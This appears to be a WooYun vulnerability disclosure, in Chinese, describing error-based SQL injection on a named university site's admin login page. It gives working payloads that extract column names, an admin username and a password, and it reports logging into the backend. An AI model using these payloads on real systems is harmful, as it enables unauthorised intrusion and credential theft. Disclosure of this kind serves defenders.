WooYun.org

http://youth.whut.edu.cn/Admin_Youth/Login.aspx 这个页面是后台的入口
在用户名处输入' having 1=1--，密码任意并登录，发现系统报错，并爆出两个重要字段Users.User_Id和Users.User_Psw，如图所示：

继续返回到登录界面，爆用户名字段。在用户名处输入1' and 1=convert(int,(select top 1 col_name(object_id('Users'),2) from Users)) and '1'='1，密码仍任意，爆出第二个字段为User_Name，如图

同时可发现查询语句为"select User_Id,User_Psw from Users where User_LoginName='"+LoginName+"'"，看来User_LoginName才是需要的字段
拿到用户名和密码的字段，下面就要爆出字段的内容了
返回到登录界面，用户名输入' and (select top 1 User_LoginName from Users)>0--，密码任意，爆出了一个账号，如图

再次注入' and (select top 1 User_Psw from Users)>0--，爆出对应的密码，如图

用该账号密码，轻松登入后台。到此结束，未继续深入